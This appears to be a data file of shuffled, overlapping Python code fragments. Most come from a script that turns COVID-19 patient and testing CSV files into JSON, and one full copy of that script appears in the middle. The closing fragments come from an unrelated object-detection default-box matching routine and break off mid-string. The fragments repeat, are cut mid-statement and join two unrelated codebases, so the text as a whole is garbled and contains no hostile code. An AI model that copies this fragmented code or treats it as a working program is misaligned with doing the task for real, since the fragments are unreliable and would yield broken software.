patients_summary_dic[date.strftime('%Y-%m-%d')] })", "検査件数の読み込み inspections_summary_list = [] with open('data/inspections_summary.csv', 'r', encoding=\"utf-8\") as csvfile:", "# 日付差の日数を算出(リストに最終日も含めたいので、+1しています) days_num = (enddt - strdt).days + 1 datelist", "patients_summary_list = patients_summary_list[::-1] # 日付の昇順に並び替え # main_summary_history.csvをPandasのDataframeに変換 main_summary_history_df = pd.read_csv('data/main_summary_history.csv',", "data = { \"lastUpdate\": JST_current_time, \"patients\": { \"date\": JST_current_time, \"data\":", "inspections_summary_list.append({ \"日付\": datetime.strptime(row['検査日'], '%Y/%m/%d').strftime('%Y-%m-%d'), \"小計\": int(row['検査件数(件)']), \"合算\": row['合算'] }) data", "\"data\": json.loads(main_summary_history_df.to_json(orient='records', force_ascii=False)) } } sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8') print(json.dumps(data,", "pd import sys from dateutil import tz from datetime import", "# 開始日 enddt = datetime.strptime(args[1], '%Y-%m-%d') # 終了日 # 日付差の日数を算出(リストに最終日も含めたいので、+1しています)", "= [] # 日付の新しい順に辿って小計が 0 でない日から開始する foundZero = True for", "\"日付\": date.strftime('%Y-%m-%d'), \"小計\": patients_summary_dic[date.strftime('%Y-%m-%d')] }) patients_summary_list = patients_summary_list[::-1] # 日付の昇順に並び替え", "strdt).days + 1 datelist = [] for i in range(days_num):", "}) data = { \"lastUpdate\": JST_current_time, \"patients\": { \"date\": JST_current_time,", "from datetime import datetime, date, time, timedelta # Japan Standard", "= [] patients_summary_dic = {} # 引数を取得 異常系処理はしてないので注意 args =", "でない日から開始する foundZero = True for date in reversed(datelist): if (not", "\"小計\": patients_summary_dic[date.strftime('%Y-%m-%d')] }) patients_summary_list = patients_summary_list[::-1] # 日付の昇順に並び替え # main_summary_history.csvをPandasのDataframeに変換", "# 日付の新しい順に辿って小計が 0 でない日から開始する foundZero = True for date in", "sys from dateutil import tz from datetime import datetime, date,", "0) patients_summary_dic[row['date']] += 1 # 日付のリストを生成 strdt = datetime.strptime(\"2020-01-26\", '%Y-%m-%d')", "for date in reversed(datelist): if (not (date.strftime('%Y-%m-%d') in patients_summary_dic)) and", "\"合算\": row['合算'] }) data = { \"lastUpdate\": JST_current_time, \"patients\": {", "\"date\": JST_current_time, \"data\": patients_summary_list }, \"inspections_summary\" : { \"date\": JST_current_time,", "in reader: patients_list.append(row) patients_summary_dic.setdefault(row['date'], 0) patients_summary_dic[row['date']] += 1 # 日付のリストを生成", "as pd import sys from dateutil import tz from datetime", "(not (date.strftime('%Y-%m-%d') in patients_summary_dic)) and foundZero: continue else: foundZero =", "= datetime.now(tz=JST).strftime('%Y/%m/%d %H:%M') patients_list = [] patients_summary_dic = {} #", "if (not (date.strftime('%Y-%m-%d') in patients_summary_dic)) and foundZero: continue else: foundZero", "datetime.now(tz=JST).strftime('%Y/%m/%d %H:%M') patients_list = [] patients_summary_dic = {} # 引数を取得", "異常系処理はしてないので注意 args = sys.argv with open('data/patients.csv', 'r', encoding=\"utf-8\") as csvfile:", "in patients_summary_dic)) and foundZero: continue else: foundZero = False patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'),", "}, \"main_summary_history\": { \"date\": JST_current_time, \"data\": json.loads(main_summary_history_df.to_json(orient='records', force_ascii=False)) } }", "# 日付の昇順に並び替え # main_summary_history.csvをPandasのDataframeに変換 main_summary_history_df = pd.read_csv('data/main_summary_history.csv', keep_default_na=False) # 検査件数の読み込み", "1 # 日付のリストを生成 strdt = datetime.strptime(\"2020-01-26\", '%Y-%m-%d') # 開始日 enddt", "0 でない日から開始する foundZero = True for date in reversed(datelist): if", "io import json import pandas as pd import sys from", "i)) patients_summary_list = [] # 日付の新しい順に辿って小計が 0 でない日から開始する foundZero =", "import pandas as pd import sys from dateutil import tz", "patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'), 0) patients_summary_list.append({ \"日付\": date.strftime('%Y-%m-%d'), \"小計\": patients_summary_dic[date.strftime('%Y-%m-%d')] }) patients_summary_list =", "+= 1 # 日付のリストを生成 strdt = datetime.strptime(\"2020-01-26\", '%Y-%m-%d') # 開始日", "csvfile: reader = csv.DictReader(csvfile) for row in reader: inspections_summary_list.append({ \"日付\":", "\"小計\": int(row['検査件数(件)']), \"合算\": row['合算'] }) data = { \"lastUpdate\": JST_current_time,", "JST_current_time = datetime.now(tz=JST).strftime('%Y/%m/%d %H:%M') patients_list = [] patients_summary_dic = {}", "for row in reader: inspections_summary_list.append({ \"日付\": datetime.strptime(row['検査日'], '%Y/%m/%d').strftime('%Y-%m-%d'), \"小計\": int(row['検査件数(件)']),", "\"lastUpdate\": JST_current_time, \"patients\": { \"date\": JST_current_time, \"data\": patients_list }, \"patients_summary\"", "+ timedelta(days = i)) patients_summary_list = [] # 日付の新しい順に辿って小計が 0", "Japan Standard Time (UTC + 09:00) JST = tz.gettz('Asia/Tokyo') JST_current_time", "days_num = (enddt - strdt).days + 1 datelist = []", "patients_summary_dic.setdefault(row['date'], 0) patients_summary_dic[row['date']] += 1 # 日付のリストを生成 strdt = datetime.strptime(\"2020-01-26\",", "date in reversed(datelist): if (not (date.strftime('%Y-%m-%d') in patients_summary_dic)) and foundZero:", "日付のリストを生成 strdt = datetime.strptime(\"2020-01-26\", '%Y-%m-%d') # 開始日 enddt = datetime.strptime(args[1],", "{} # 引数を取得 異常系処理はしてないので注意 args = sys.argv with open('data/patients.csv', 'r',", "reader = csv.DictReader(csvfile) for row in reader: patients_list.append(row) patients_summary_dic.setdefault(row['date'], 0)", "with open('data/inspections_summary.csv', 'r', encoding=\"utf-8\") as csvfile: reader = csv.DictReader(csvfile) for", "{ \"date\": JST_current_time, \"data\": patients_summary_list }, \"inspections_summary\" : { \"date\":", "= (enddt - strdt).days + 1 datelist = [] for", "= i)) patients_summary_list = [] # 日付の新しい順に辿って小計が 0 でない日から開始する foundZero", "日付差の日数を算出(リストに最終日も含めたいので、+1しています) days_num = (enddt - strdt).days + 1 datelist =", "'%Y/%m/%d').strftime('%Y-%m-%d'), \"小計\": int(row['検査件数(件)']), \"合算\": row['合算'] }) data = { \"lastUpdate\":", "json import pandas as pd import sys from dateutil import", "patients_list.append(row) patients_summary_dic.setdefault(row['date'], 0) patients_summary_dic[row['date']] += 1 # 日付のリストを生成 strdt =", "inspections_summary_list = [] with open('data/inspections_summary.csv', 'r', encoding=\"utf-8\") as csvfile: reader", "patients_summary_dic[row['date']] += 1 # 日付のリストを生成 strdt = datetime.strptime(\"2020-01-26\", '%Y-%m-%d') #", "with open('data/patients.csv', 'r', encoding=\"utf-8\") as csvfile: reader = csv.DictReader(csvfile) for", "main_summary_history.csvをPandasのDataframeに変換 main_summary_history_df = pd.read_csv('data/main_summary_history.csv', keep_default_na=False) # 検査件数の読み込み inspections_summary_list = []", "[] with open('data/inspections_summary.csv', 'r', encoding=\"utf-8\") as csvfile: reader = csv.DictReader(csvfile)", "}, \"inspections_summary\" : { \"date\": JST_current_time, \"data\": inspections_summary_list }, \"main_summary_history\":", "json.loads(main_summary_history_df.to_json(orient='records', force_ascii=False)) } } sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8') print(json.dumps(data, indent=4,", "open('data/inspections_summary.csv', 'r', encoding=\"utf-8\") as csvfile: reader = csv.DictReader(csvfile) for row", "(enddt - strdt).days + 1 datelist = [] for i", "JST_current_time, \"data\": json.loads(main_summary_history_df.to_json(orient='records', force_ascii=False)) } } sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')", "pd.read_csv('data/main_summary_history.csv', keep_default_na=False) # 検査件数の読み込み inspections_summary_list = [] with open('data/inspections_summary.csv', 'r',", "JST_current_time, \"data\": inspections_summary_list }, \"main_summary_history\": { \"date\": JST_current_time, \"data\": json.loads(main_summary_history_df.to_json(orient='records',", "import csv import io import json import pandas as pd", "import datetime, date, time, timedelta # Japan Standard Time (UTC", "row in reader: patients_list.append(row) patients_summary_dic.setdefault(row['date'], 0) patients_summary_dic[row['date']] += 1 #", "from dateutil import tz from datetime import datetime, date, time,", "[] for i in range(days_num): datelist.append(strdt + timedelta(days = i))", "JST = tz.gettz('Asia/Tokyo') JST_current_time = datetime.now(tz=JST).strftime('%Y/%m/%d %H:%M') patients_list = []", "(date.strftime('%Y-%m-%d') in patients_summary_dic)) and foundZero: continue else: foundZero = False", "for i in range(days_num): datelist.append(strdt + timedelta(days = i)) patients_summary_list", "日付の昇順に並び替え # main_summary_history.csvをPandasのDataframeに変換 main_summary_history_df = pd.read_csv('data/main_summary_history.csv', keep_default_na=False) # 検査件数の読み込み inspections_summary_list", "tz from datetime import datetime, date, time, timedelta # Japan", "終了日 # 日付差の日数を算出(リストに最終日も含めたいので、+1しています) days_num = (enddt - strdt).days + 1", "(UTC + 09:00) JST = tz.gettz('Asia/Tokyo') JST_current_time = datetime.now(tz=JST).strftime('%Y/%m/%d %H:%M')", "range(days_num): datelist.append(strdt + timedelta(days = i)) patients_summary_list = [] #", "\"日付\": datetime.strptime(row['検査日'], '%Y/%m/%d').strftime('%Y-%m-%d'), \"小計\": int(row['検査件数(件)']), \"合算\": row['合算'] }) data =", "time, timedelta # Japan Standard Time (UTC + 09:00) JST", "\"date\": JST_current_time, \"data\": inspections_summary_list }, \"main_summary_history\": { \"date\": JST_current_time, \"data\":", "[] # 日付の新しい順に辿って小計が 0 でない日から開始する foundZero = True for date", "import io import json import pandas as pd import sys", "dateutil import tz from datetime import datetime, date, time, timedelta", "strdt = datetime.strptime(\"2020-01-26\", '%Y-%m-%d') # 開始日 enddt = datetime.strptime(args[1], '%Y-%m-%d')", "patients_summary_list = [] # 日付の新しい順に辿って小計が 0 でない日から開始する foundZero = True", "+ 09:00) JST = tz.gettz('Asia/Tokyo') JST_current_time = datetime.now(tz=JST).strftime('%Y/%m/%d %H:%M') patients_list", "pandas as pd import sys from dateutil import tz from", "# Japan Standard Time (UTC + 09:00) JST = tz.gettz('Asia/Tokyo')", "datetime.strptime(row['検査日'], '%Y/%m/%d').strftime('%Y-%m-%d'), \"小計\": int(row['検査件数(件)']), \"合算\": row['合算'] }) data = {", "csv.DictReader(csvfile) for row in reader: inspections_summary_list.append({ \"日付\": datetime.strptime(row['検査日'], '%Y/%m/%d').strftime('%Y-%m-%d'), \"小計\":", "csvfile: reader = csv.DictReader(csvfile) for row in reader: patients_list.append(row) patients_summary_dic.setdefault(row['date'],", "= datetime.strptime(\"2020-01-26\", '%Y-%m-%d') # 開始日 enddt = datetime.strptime(args[1], '%Y-%m-%d') #", "True for date in reversed(datelist): if (not (date.strftime('%Y-%m-%d') in patients_summary_dic))", "date.strftime('%Y-%m-%d'), \"小計\": patients_summary_dic[date.strftime('%Y-%m-%d')] }) patients_summary_list = patients_summary_list[::-1] # 日付の昇順に並び替え #", "\"date\": JST_current_time, \"data\": patients_list }, \"patients_summary\" : { \"date\": JST_current_time,", "<reponame>sungpyocho/covid19-aichi-tools import csv import io import json import pandas as", "encoding=\"utf-8\") as csvfile: reader = csv.DictReader(csvfile) for row in reader:", ": { \"date\": JST_current_time, \"data\": patients_summary_list }, \"inspections_summary\" : {", "csv import io import json import pandas as pd import", "\"inspections_summary\" : { \"date\": JST_current_time, \"data\": inspections_summary_list }, \"main_summary_history\": {", "timedelta(days = i)) patients_summary_list = [] # 日付の新しい順に辿って小計が 0 でない日から開始する", "csv.DictReader(csvfile) for row in reader: patients_list.append(row) patients_summary_dic.setdefault(row['date'], 0) patients_summary_dic[row['date']] +=", "for row in reader: patients_list.append(row) patients_summary_dic.setdefault(row['date'], 0) patients_summary_dic[row['date']] += 1", "}) patients_summary_list = patients_summary_list[::-1] # 日付の昇順に並び替え # main_summary_history.csvをPandasのDataframeに変換 main_summary_history_df =", "datetime import datetime, date, time, timedelta # Japan Standard Time", "\"date\": JST_current_time, \"data\": json.loads(main_summary_history_df.to_json(orient='records', force_ascii=False)) } } sys.stdout = io.TextIOWrapper(sys.stdout.buffer,", "# 終了日 # 日付差の日数を算出(リストに最終日も含めたいので、+1しています) days_num = (enddt - strdt).days +", "}, \"patients_summary\" : { \"date\": JST_current_time, \"data\": patients_summary_list }, \"inspections_summary\"", "\"data\": patients_summary_list }, \"inspections_summary\" : { \"date\": JST_current_time, \"data\": inspections_summary_list", "enddt = datetime.strptime(args[1], '%Y-%m-%d') # 終了日 # 日付差の日数を算出(リストに最終日も含めたいので、+1しています) days_num =", "row['合算'] }) data = { \"lastUpdate\": JST_current_time, \"patients\": { \"date\":", "= datetime.strptime(args[1], '%Y-%m-%d') # 終了日 # 日付差の日数を算出(リストに最終日も含めたいので、+1しています) days_num = (enddt", "patients_summary_dic)) and foundZero: continue else: foundZero = False patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'), 0)", "tz.gettz('Asia/Tokyo') JST_current_time = datetime.now(tz=JST).strftime('%Y/%m/%d %H:%M') patients_list = [] patients_summary_dic =", "\"patients_summary\" : { \"date\": JST_current_time, \"data\": patients_summary_list }, \"inspections_summary\" :", "force_ascii=False)) } } sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8') print(json.dumps(data, indent=4, ensure_ascii=False))", "JST_current_time, \"data\": patients_list }, \"patients_summary\" : { \"date\": JST_current_time, \"data\":", "JST_current_time, \"patients\": { \"date\": JST_current_time, \"data\": patients_list }, \"patients_summary\" :", ": { \"date\": JST_current_time, \"data\": inspections_summary_list }, \"main_summary_history\": { \"date\":", "timedelta # Japan Standard Time (UTC + 09:00) JST =", "= { \"lastUpdate\": JST_current_time, \"patients\": { \"date\": JST_current_time, \"data\": patients_list", "args = sys.argv with open('data/patients.csv', 'r', encoding=\"utf-8\") as csvfile: reader", "row in reader: inspections_summary_list.append({ \"日付\": datetime.strptime(row['検査日'], '%Y/%m/%d').strftime('%Y-%m-%d'), \"小計\": int(row['検査件数(件)']), \"合算\":", "# main_summary_history.csvをPandasのDataframeに変換 main_summary_history_df = pd.read_csv('data/main_summary_history.csv', keep_default_na=False) # 検査件数の読み込み inspections_summary_list =", "JST_current_time, \"data\": patients_summary_list }, \"inspections_summary\" : { \"date\": JST_current_time, \"data\":", "[] patients_summary_dic = {} # 引数を取得 異常系処理はしてないので注意 args = sys.argv", "patients_list }, \"patients_summary\" : { \"date\": JST_current_time, \"data\": patients_summary_list },", "as csvfile: reader = csv.DictReader(csvfile) for row in reader: inspections_summary_list.append({", "\"data\": patients_list }, \"patients_summary\" : { \"date\": JST_current_time, \"data\": patients_summary_list", "= tz.gettz('Asia/Tokyo') JST_current_time = datetime.now(tz=JST).strftime('%Y/%m/%d %H:%M') patients_list = [] patients_summary_dic", "- strdt).days + 1 datelist = [] for i in", "import json import pandas as pd import sys from dateutil", "patients_summary_list }, \"inspections_summary\" : { \"date\": JST_current_time, \"data\": inspections_summary_list },", "import tz from datetime import datetime, date, time, timedelta #", "{ \"date\": JST_current_time, \"data\": json.loads(main_summary_history_df.to_json(orient='records', force_ascii=False)) } } sys.stdout =", "import sys from dateutil import tz from datetime import datetime,", "= [] for i in range(days_num): datelist.append(strdt + timedelta(days =", "patients_summary_dic[date.strftime('%Y-%m-%d')] }) patients_summary_list = patients_summary_list[::-1] # 日付の昇順に並び替え # main_summary_history.csvをPandasのDataframeに変換 main_summary_history_df", "datelist = [] for i in range(days_num): datelist.append(strdt + timedelta(days", "09:00) JST = tz.gettz('Asia/Tokyo') JST_current_time = datetime.now(tz=JST).strftime('%Y/%m/%d %H:%M') patients_list =", "Time (UTC + 09:00) JST = tz.gettz('Asia/Tokyo') JST_current_time = datetime.now(tz=JST).strftime('%Y/%m/%d", "i in range(days_num): datelist.append(strdt + timedelta(days = i)) patients_summary_list =", "and foundZero: continue else: foundZero = False patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'), 0) patients_summary_list.append({", "+ 1 datelist = [] for i in range(days_num): datelist.append(strdt", "foundZero = False patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'), 0) patients_summary_list.append({ \"日付\": date.strftime('%Y-%m-%d'), \"小計\": patients_summary_dic[date.strftime('%Y-%m-%d')]", "reader = csv.DictReader(csvfile) for row in reader: inspections_summary_list.append({ \"日付\": datetime.strptime(row['検査日'],", "= pd.read_csv('data/main_summary_history.csv', keep_default_na=False) # 検査件数の読み込み inspections_summary_list = [] with open('data/inspections_summary.csv',", "reader: patients_list.append(row) patients_summary_dic.setdefault(row['date'], 0) patients_summary_dic[row['date']] += 1 # 日付のリストを生成 strdt", "{ \"lastUpdate\": JST_current_time, \"patients\": { \"date\": JST_current_time, \"data\": patients_list },", "reversed(datelist): if (not (date.strftime('%Y-%m-%d') in patients_summary_dic)) and foundZero: continue else:", "引数を取得 異常系処理はしてないので注意 args = sys.argv with open('data/patients.csv', 'r', encoding=\"utf-8\") as", "\"data\": inspections_summary_list }, \"main_summary_history\": { \"date\": JST_current_time, \"data\": json.loads(main_summary_history_df.to_json(orient='records', force_ascii=False))", "\"main_summary_history\": { \"date\": JST_current_time, \"data\": json.loads(main_summary_history_df.to_json(orient='records', force_ascii=False)) } } sys.stdout", "= {} # 引数を取得 異常系処理はしてないので注意 args = sys.argv with open('data/patients.csv',", "= csv.DictReader(csvfile) for row in reader: patients_list.append(row) patients_summary_dic.setdefault(row['date'], 0) patients_summary_dic[row['date']]", "\"patients\": { \"date\": JST_current_time, \"data\": patients_list }, \"patients_summary\" : {", "patients_list = [] patients_summary_dic = {} # 引数を取得 異常系処理はしてないので注意 args", "Standard Time (UTC + 09:00) JST = tz.gettz('Asia/Tokyo') JST_current_time =", "as csvfile: reader = csv.DictReader(csvfile) for row in reader: patients_list.append(row)", "日付の新しい順に辿って小計が 0 でない日から開始する foundZero = True for date in reversed(datelist):", "= True for date in reversed(datelist): if (not (date.strftime('%Y-%m-%d') in", "patients_summary_list[::-1] # 日付の昇順に並び替え # main_summary_history.csvをPandasのDataframeに変換 main_summary_history_df = pd.read_csv('data/main_summary_history.csv', keep_default_na=False) #", "False patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'), 0) patients_summary_list.append({ \"日付\": date.strftime('%Y-%m-%d'), \"小計\": patients_summary_dic[date.strftime('%Y-%m-%d')] }) patients_summary_list", "main_summary_history_df = pd.read_csv('data/main_summary_history.csv', keep_default_na=False) # 検査件数の読み込み inspections_summary_list = [] with", "= csv.DictReader(csvfile) for row in reader: inspections_summary_list.append({ \"日付\": datetime.strptime(row['検査日'], '%Y/%m/%d').strftime('%Y-%m-%d'),", "keep_default_na=False) # 検査件数の読み込み inspections_summary_list = [] with open('data/inspections_summary.csv', 'r', encoding=\"utf-8\")", "int(row['検査件数(件)']), \"合算\": row['合算'] }) data = { \"lastUpdate\": JST_current_time, \"patients\":", "continue else: foundZero = False patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'), 0) patients_summary_list.append({ \"日付\": date.strftime('%Y-%m-%d')," ]
[ "object_ind, dbox_ind in enumerate(best_dbox_ind_per_object): best_object_ind_per_dbox[dbox_ind] = object_ind best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999)", "target[:, :4], target[:, 4:12], target[:, 12:] # overlaps' shape =", "enumerate(dbox_indices): object_indices[dbox_ind] = obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1) #", "means (cx, cy, w, h) :param kwargs: threshold: (Optional) float,", "shape = (batch num, object num) overlaps_per_object, dbox_indices = overlaps.max(dim=1)", "default box is object or background. matched_targets: Tensor, shape =", "dboxes num) overlaps_per_dbox, object_indices = overlaps.max(dim=0) # object_indices = object_indices.long()", "import centroids2corners, iou def matching_strategy(targets, dboxes, **kwargs): \"\"\" :param targets:", "that means (cx, cy, w, h) :param kwargs: threshold: (Optional)", "matched_targets[b, :, :4], matched_targets[b, :, 4:12], matched_targets[b, :, 12:] =", ":4], target[:, 4:12], target[:, 12:] # overlaps' shape = (object", "each default box is object or background. matched_targets: Tensor, shape", "is (batch*object num(batch), 4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels) :param dboxes: shape is (default boxes", "enumerate(dbox_indices): object_indices[dbox_ind] = obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1)# ensure", "Tensor, shape = (batch, default box num, 4+class_num) including background", "# overlaps' shape = (object num, default box num) overlaps", "overlaps_per_dbox, object_indices = overlaps.max(dim=0) #object_indices = object_indices.long() # for fancy", "-1] = 1 return pos_indicator, matched_targets def matching_strategy_quads(targets, dboxes, **kwargs):", "threshold + 1) # ensure N!=0 pos_ind = overlaps_per_dbox >", "12:] # overlaps' shape = (object num, default box num)", "= object_ind best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999) pos_ind = best_overlap_per_dbox > threshold", "matched_targets def matching_strategy_quads(targets, dboxes, **kwargs): \"\"\" :param targets: Tensor, shape", "object # shape = (batch num, object num) overlaps_per_object, dbox_indices", "pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty((batch_num, dboxes_num, 4", "torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty((batch_num, dboxes_num, 4 + class_num), device=device)", "Tensor pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty( (batch_num,", "import torch from ....data.utils.boxes import centroids2corners, iou def matching_strategy(targets, dboxes,", "or background. matched_targets: Tensor, shape = (batch, default box num,", "image' and 'localization=(cx, cy, w, h)' class_num = targets[0].shape[1] -", "4 # convert centered coordinated to minmax coordinates dboxes_mm =", "target in enumerate(targets): targets_loc, targets_quad, targets_conf = target[:, :4], target[:,", "# assign targets matched_targets[b, :, :4], matched_targets[b, :, 4:12], matched_targets[b,", "4:12], matched_targets[b, :, 12:] = \\ targets_loc[object_indices], targets_quad[object_indices], targets_conf[object_indices] pos_indicator[b]", "cy, w, h) :param kwargs: threshold: (Optional) float, threshold for", "# shape = (batch num, dboxes num) overlaps_per_dbox, object_indices =", "to minmax coordinates dboxes_mm = centroids2corners(dboxes) # create returned empty", "including background \"\"\" threshold = kwargs.pop('threshold', 0.5) batch_num = kwargs.pop('batch_num')", "targets_loc[object_indices], targets_quad[object_indices], targets_conf[object_indices] pos_indicator[b] = pos_ind # set background flag", "target in enumerate(targets): targets_loc, targets_conf = target[:, :4], target[:, 4:]", "matched_targets[b, neg_ind, 12:] = 0 matched_targets[b, neg_ind, -1] = 1", "dtype=torch.bool), torch.empty((batch_num, dboxes_num, 4 + class_num), device=device) # matching for", "returned empty Tensor pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool),", "best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0) for object_ind, dbox_ind in enumerate(best_dbox_ind_per_object): best_object_ind_per_dbox[dbox_ind]", "targets matched_targets[b, :, :4], matched_targets[b, :, 4:12], matched_targets[b, :, 12:]", "cy, w, h)' class_num = targets[0].shape[1] - 4 # convert", "Note that means (cx, cy, w, h) :param kwargs: threshold:", "h)' class_num = targets[0].shape[1] - 4 - 8 # convert", "= targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox] neg_ind = torch.logical_not(pos_ind) gt_conf[b, neg_ind] = 0", "N!=0 pos_ind = overlaps_per_dbox > threshold # assign targets matched_targets[b,", "dbox_indices, threshold + 1) # ensure N!=0 pos_ind = overlaps_per_dbox", "dboxes_mm = centroids2corners(dboxes) # create returned empty Tensor pos_indicator, matched_targets", "4 - 8 # convert centered coordinated to minmax coordinates", "# set background flag neg_ind = torch.logical_not(pos_ind) matched_targets[b, neg_ind, 4:]", "w, h)' class_num = targets[0].shape[1] - 4 # convert centered", "object_ind best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999) pos_ind = best_overlap_per_dbox > threshold pos_indicator[b]", "(batch, default box num). this represents whether each default box", "12:] = 0 matched_targets[b, neg_ind, -1] = 1 return pos_indicator,", "minmax coordinates dboxes_mm = centroids2corners(dboxes) # create returned empty Tensor", "= (batch num, dboxes num) overlaps_per_dbox, object_indices = overlaps.max(dim=0) #", "get maximum overlap value for each default box # shape", "= target[:, :4], target[:, 4:] # overlaps' shape = (object", "= torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty( (batch_num, dboxes_num, 4 +", "coordinated to minmax coordinates dboxes_mm = centroids2corners(dboxes) # create returned", "matched_targets[b, :, :4], matched_targets[b, :, 4:] = targets_loc[object_indices], targets_conf[object_indices] pos_indicator[b]", "targets_loc, targets_conf = target[:, :4], target[:, 4:] # overlaps' shape", "obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1)# ensure N!=0 pos_ind =", "num, 4+class_num) including background \"\"\" threshold = kwargs.pop('threshold', 0.5) batch_num", "object_indices = overlaps.max(dim=0) # object_indices = object_indices.long() # for fancy", "torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty( (batch_num, dboxes_num, 4 + 8", "torch from ....data.utils.boxes import centroids2corners, iou def matching_strategy(targets, dboxes, **kwargs):", "num). this represents whether each default box is object or", ":param targets: Tensor, shape is (batch*object num(batch), 1+4+class_labels) :param dboxes:", "maximum overlap values for each object # shape = (batch", "(batch*object num(batch), 4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels) :param dboxes: shape is (default boxes num,", "targets: Tensor, shape is (batch*object num(batch), 1+4+class_labels) :param dboxes: shape", "obj_ind, dbox_ind in enumerate(dbox_indices): object_indices[dbox_ind] = obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold", "(Optional) float, threshold for returned indicator batch_num: (Required) int, batch", "= iou(centroids2corners(targets_loc), dboxes_mm.clone()) \"\"\" best_overlap_per_object, best_dbox_ind_per_object = overlaps.max(dim=1) best_overlap_per_dbox, best_object_ind_per_dbox", "get maximum overlap values for each object # shape =", "\"\"\" :param targets: Tensor, shape is (batch*object num(batch), 4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels) :param", "represents whether each default box is object or background. matched_targets:", "Tensor, shape is (batch*object num(batch), 4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels) :param dboxes: shape is", "overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone()) \"\"\" best_overlap_per_object, best_dbox_ind_per_object = overlaps.max(dim=1) best_overlap_per_dbox,", "background. matched_targets: Tensor, shape = (batch, default box num, 4+class_num)", "assign targets matched_targets[b, :, :4], matched_targets[b, :, 4:] = targets_loc[object_indices],", "for returned indicator batch_num: (Required) int, batch size :return: pos_indicator:", "overlaps.max(dim=0) for object_ind, dbox_ind in enumerate(best_dbox_ind_per_object): best_object_ind_per_dbox[dbox_ind] = object_ind best_overlap_per_dbox.index_fill_(0,", "(cx, cy, w, h) :param kwargs: threshold: (Optional) float, threshold", "999) pos_ind = best_overlap_per_dbox > threshold pos_indicator[b] = pos_ind gt_loc[b],", "matching_strategy_quads(targets, dboxes, **kwargs): \"\"\" :param targets: Tensor, shape is (batch*object", "> threshold pos_indicator[b] = pos_ind gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox]", "shape = (batch num, dboxes num) overlaps_per_dbox, object_indices = overlaps.max(dim=0)", "'localization=(cx, cy, w, h)' class_num = targets[0].shape[1] - 4 -", "pos_ind = best_overlap_per_dbox > threshold pos_indicator[b] = pos_ind gt_loc[b], gt_conf[b]", "default box num, 4+class_num) including background \"\"\" threshold = kwargs.pop('threshold',", "neg_ind, -1] = 1 return pos_indicator, matched_targets def matching_strategy_quads(targets, dboxes,", "0 for b, target in enumerate(targets): targets_loc, targets_conf = target[:,", "pos_indicator[b] = pos_ind gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox] neg_ind =", "(object num, default box num) overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone()) \"\"\"", "0 gt_conf[b, neg_ind, -1] = 1 \"\"\" # get maximum", "+ class_num), device=device) # matching for each batch index =", "dtype=torch.bool), torch.empty( (batch_num, dboxes_num, 4 + 8 + class_num), device=device)", "(batch_num, dboxes_num, 4 + 8 + class_num), device=device) # matching", "flag neg_ind = torch.logical_not(pos_ind) matched_targets[b, neg_ind, 4:] = 0 matched_targets[b,", "overlaps_per_dbox > threshold # assign targets matched_targets[b, :, :4], matched_targets[b,", "overlap values for each object # shape = (batch num,", "batch_num: (Required) int, batch size :return: pos_indicator: Bool Tensor, shape", "neg_ind] = 0 gt_conf[b, neg_ind, -1] = 1 \"\"\" #", "for each object # shape = (batch num, object num)", "indicator batch_num: (Required) int, batch size :return: pos_indicator: Bool Tensor,", "matched_targets[b, :, 4:12], matched_targets[b, :, 12:] = \\ targets_loc[object_indices], targets_quad[object_indices],", "....data.utils.boxes import centroids2corners, iou def matching_strategy(targets, dboxes, **kwargs): \"\"\" :param", ":param dboxes: shape is (default boxes num, 4) IMPORTANT: Note", "pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty( (batch_num, dboxes_num,", "8 + class_num), device=device) # matching for each batch index", "background \"\"\" threshold = kwargs.pop('threshold', 0.5) batch_num = kwargs.pop('batch_num') device", "dboxes_num), device=device, dtype=torch.bool), torch.empty( (batch_num, dboxes_num, 4 + 8 +", "b, target in enumerate(targets): targets_loc, targets_conf = target[:, :4], target[:,", "= torch.logical_not(pos_ind) matched_targets[b, neg_ind, 12:] = 0 matched_targets[b, neg_ind, -1]", "num) overlaps_per_object, dbox_indices = overlaps.max(dim=1) for obj_ind, dbox_ind in enumerate(dbox_indices):", "box # shape = (batch num, dboxes num) overlaps_per_dbox, object_indices", "1+4+class_labels) :param dboxes: shape is (default boxes num, 4) IMPORTANT:", "int, batch size :return: pos_indicator: Bool Tensor, shape = (batch,", "overlaps_per_dbox.index_fill_(0, 